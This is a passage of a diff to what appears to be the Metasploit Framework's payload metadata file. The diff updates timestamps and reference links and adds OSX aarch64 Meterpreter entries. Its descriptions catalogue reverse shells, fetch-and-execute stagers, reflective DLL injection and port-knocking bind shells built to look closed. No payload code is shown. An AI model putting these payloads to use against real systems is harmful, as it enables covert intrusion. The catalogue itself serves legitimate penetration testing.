"arch": "cmd",
@@ -206398,7 +209509,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206440,7 +209551,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206487,7 +209598,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206530,7 +209641,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206572,7 +209683,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206614,7 +209725,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206661,7 +209772,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -206704,7 +209815,7 @@
],
"description": "Execute an x64 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210579,7 +213690,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210622,7 +213733,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for an IPv6 connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210664,7 +213775,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a pipe connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210706,7 +213817,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210753,7 +213864,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210796,7 +213907,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nListen for a connection with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210838,7 +213949,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker via a named pipe pivot",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210880,7 +213991,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210927,7 +214038,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -210970,7 +214081,7 @@
],
"description": "Fetch and Execute an x64 payload from a tftp server.\n\nConnect back to the attacker with UUID Support (Windows x64)",
"references": [
"URL-https://github.com/EgeBalci/Amber"
],
"platform": "Windows",
"arch": "cmd",
@@ -212379,7 +215490,7 @@
],
"description": "Creates an interactive shell using AWS SSM",
"references": [
"URL-https://www.sempervictus.com/single-post/once-upon-a-cloudy-air-i-crossed-a-gap-which-wasn-t-there"
],
"platform": "All",
"arch": "x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, tty, java, ruby, dalvik, python, nodejs, firefox, zarch, r",
@@ -212387,7 +215498,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-04-18 16:41:48 +0000",
"mod_time": "2023-08-01 15:02:11 +0000",
"path": "/modules/payloads/singles/generic/shell_bind_aws_ssm.rb",
"is_install_path": true,
"ref_name": "generic/shell_bind_aws_ssm",
@@ -212641,7 +215752,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-03-19 20:34:33 +0000",
"mod_time": "2023-09-27 11:20:17 +0000",
"path": "/modules/payloads/stagers/java/bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/bind_tcp",
@@ -212682,7 +215793,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-11-10 12:33:52 +0000",
"mod_time": "2023-08-09 13:13:15 +0000",
"path": "/modules/payloads/stagers/java/reverse_http.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_http",
@@ -212723,7 +215834,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-11-10 12:33:52 +0000",
"mod_time": "2023-08-09 13:13:15 +0000",
"path": "/modules/payloads/stagers/java/reverse_https.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_https",
@@ -212763,7 +215874,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-03-19 20:34:33 +0000",
"mod_time": "2023-09-27 11:20:17 +0000",
"path": "/modules/payloads/stagers/java/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/meterpreter/reverse_tcp",
@@ -212802,7 +215913,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-03-19 20:34:33 +0000",
"mod_time": "2023-09-27 11:20:17 +0000",
"path": "/modules/payloads/stagers/java/bind_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell/bind_tcp",
@@ -212841,7 +215952,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-03-19 20:34:33 +0000",
"mod_time": "2023-09-27 11:20:17 +0000",
"path": "/modules/payloads/stagers/java/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell/reverse_tcp",
@@ -212880,7 +215991,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2021-03-19 20:34:33 +0000",
"mod_time": "2023-09-27 11:20:17 +0000",
"path": "/modules/payloads/singles/java/shell_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "java/shell_reverse_tcp",
@@ -212956,7 +216067,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_http",
@@ -212994,7 +216105,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_https",
@@ -213032,7 +216143,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/aarch64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/aarch64/meterpreter_reverse_tcp",
@@ -213144,7 +216255,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_http",
@@ -213182,7 +216293,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_https",
@@ -213220,7 +216331,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/armbe/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armbe/meterpreter_reverse_tcp",
@@ -213248,7 +216359,7 @@
],
"description": "Listen for a connection and spawn a command shell",
"references": [
"URL-https://github.com/earthquake/shellcodes/blob/master/armeb_linux_ipv4_bind_tcp.s"
],
"platform": "Linux",
"arch": "armbe",
@@ -213256,7 +216367,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/singles/linux/armbe/shell_bind_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armbe/shell_bind_tcp",
@@ -213445,7 +216556,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_http",
@@ -213483,7 +216594,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_https",
@@ -213521,7 +216632,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/armle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/armle/meterpreter_reverse_tcp",
@@ -213709,7 +216820,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_http",
@@ -213747,7 +216858,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_https",
@@ -213785,7 +216896,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mips64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mips64/meterpreter_reverse_tcp",
@@ -213900,7 +217011,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_http",
@@ -213938,7 +217049,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_https",
@@ -213976,7 +217087,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsbe/meterpreter_reverse_tcp",
@@ -214243,7 +217354,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_http",
@@ -214281,7 +217392,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_https",
@@ -214319,7 +217430,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/mipsle/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/mipsle/meterpreter_reverse_tcp",
@@ -214509,7 +217620,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_http",
@@ -214547,7 +217658,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_https",
@@ -214585,7 +217696,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppc/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc/meterpreter_reverse_tcp",
@@ -214839,7 +217950,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_http",
@@ -214877,7 +217988,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_https",
@@ -214915,7 +218026,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppc64le/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppc64le/meterpreter_reverse_tcp",
@@ -214953,7 +218064,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_http",
@@ -214991,7 +218102,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_https",
@@ -215029,7 +218140,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/ppce500v2/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/ppce500v2/meterpreter_reverse_tcp",
@@ -215222,7 +218333,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_http",
@@ -215260,7 +218371,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_https",
@@ -215298,7 +218409,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/x64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/x64/meterpreter_reverse_tcp",
@@ -215586,7 +218697,7 @@
],
"description": "Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.",
"references": [
"URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm"
],
"platform": "Linux",
"arch": "x64",
@@ -215594,7 +218705,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-09-22 12:55:41 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/singles/linux/x64/shell_bind_tcp_random_port.rb",
"is_install_path": true,
"ref_name": "linux/x64/shell_bind_tcp_random_port",
@@ -217122,7 +220233,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_http",
@@ -217160,7 +220271,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_https",
@@ -217198,7 +220309,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2022-11-04 00:33:03 +0000",
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/linux/zarch/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "linux/zarch/meterpreter_reverse_tcp",
@@ -217472,6 +220583,165 @@
"payload_type": 1,
"staged": false
},
"payload_osx/aarch64/meterpreter/reverse_tcp": {
"name": "OSX Meterpreter, Reverse TCP Stager",
"fullname": "payload/osx/aarch64/meterpreter/reverse_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"parchedmind",
"nologic",
"timwr",
"usiegl00"
],
"description": "Inject the mettle server payload (staged).\n\nConnect back to the attacker",
"references": [
"URL-https://github.com/CylanceVulnResearch/osx_runbin",
"URL-https://github.com/nologic/shellcc"
],
"platform": "OSX",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-07-31 20:30:30 +0000",
"path": "/modules/payloads/stagers/osx/aarch64/reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/aarch64/meterpreter/reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false,
"payload_type": 2,
"staged": true,
"stage_refname": "osx/aarch64/meterpreter",
"stager_refname": "osx/aarch64/reverse_tcp"
},
"payload_osx/aarch64/meterpreter_reverse_http": {
"name": "OSX Meterpreter, Reverse HTTP Inline",
"fullname": "payload/osx/aarch64/meterpreter_reverse_http",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr",
"usiegl00"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_http.rb",
"is_install_path": true,
"ref_name": "osx/aarch64/meterpreter_reverse_http",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false,
"payload_type": 1,
"staged": false
},
"payload_osx/aarch64/meterpreter_reverse_https": {
"name": "OSX Meterpreter, Reverse HTTPS Inline",
"fullname": "payload/osx/aarch64/meterpreter_reverse_https",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr",
"usiegl00"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_https.rb",
"is_install_path": true,
"ref_name": "osx/aarch64/meterpreter_reverse_https",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false,
"payload_type": 1,
"staged": false
},
"payload_osx/aarch64/meterpreter_reverse_tcp": {
"name": "OSX Meterpreter, Reverse TCP Inline",
"fullname": "payload/osx/aarch64/meterpreter_reverse_tcp",
"aliases": [
],
"rank": 300,
"disclosure_date": null,
"type": "payload",
"author": [
"Adam Cammack <adam_cammack@rapid7.com>",
"Brent Cook <brent_cook@rapid7.com>",
"timwr",
"usiegl00"
],
"description": "Run the Meterpreter / Mettle server payload (stageless)",
"references": [
],
"platform": "OSX",
"arch": "aarch64",
"rport": null,
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2023-06-19 12:11:18 +0000",
"path": "/modules/payloads/singles/osx/aarch64/meterpreter_reverse_tcp.rb",
"is_install_path": true,
"ref_name": "osx/aarch64/meterpreter_reverse_tcp",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
},
"session_types": false,
"needs_cleanup": false,
"payload_type": 1,
"staged": false
},
"payload_osx/armle/execute/bind_tcp": {
"name": "OS X Write and Execute Binary, Bind TCP Stager",
"fullname": "payload/osx/armle/execute/bind_tcp",
@@ -220762,7 +224032,7 @@
],
"description": "Custom shellcode stage.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -220770,7 +224040,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/custom/bind_hidden_ipknock_tcp",
@@ -220804,7 +224074,7 @@
],
"description": "Custom shellcode stage.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -220812,7 +224082,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/custom/bind_hidden_tcp",
@@ -221896,7 +225166,8 @@
"description": "Inject a DLL via a reflective loader.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -221904,7 +225175,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_hidden_ipknock_tcp",
@@ -221938,7 +225209,8 @@
"description": "Inject a DLL via a reflective loader.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -221946,7 +225218,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/dllinject/bind_hidden_tcp",
@@ -223068,7 +226340,8 @@
"description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -223076,7 +226349,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_hidden_ipknock_tcp",
@@ -223111,7 +226384,8 @@
"description": "Inject the Meterpreter server DLL via the Reflective Dll Injection payload (staged). Requires Windows XP SP2 or newer.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.",
"references": [
"URL-https://github.com/stephenfewer/ReflectiveDLLInjection",
"URL-https://github.com/rapid7/ReflectiveDLLInjection"
"URL-https://github.com/rapid7/ReflectiveDLLInjection",
"URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html"
],
"platform": "Windows",
"arch": "x86",
@@ -223119,7 +226393,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_tcp.rb",
"is_install_path": true,
"ref_name": "windows/meterpreter/bind_hidden_tcp",
@@ -224515,7 +227789,7 @@
],
"description": "Inject a custom DLL into the exploited process.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode",
"references": [
"URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html"
],
"platform": "Windows",
"arch": "x86",
@@ -224523,7 +227797,7 @@
"autofilter_ports": null,
"autofilter_services": null,
"targets": null,
"mod_time": "2020-09-22 02:56:51 +0000",
"mod_time": "2023-07-27 16:02:37 +0000",
"path": "/modules/payloads/stagers/windows/bind_hidden_ipknock_tcp.rb",
"is_install_path": true,
"ref_name": "windows/patchupdllinject/bind_hidden_ipknock_tcp",
@@ -224557,7 +227831,7 @@
],
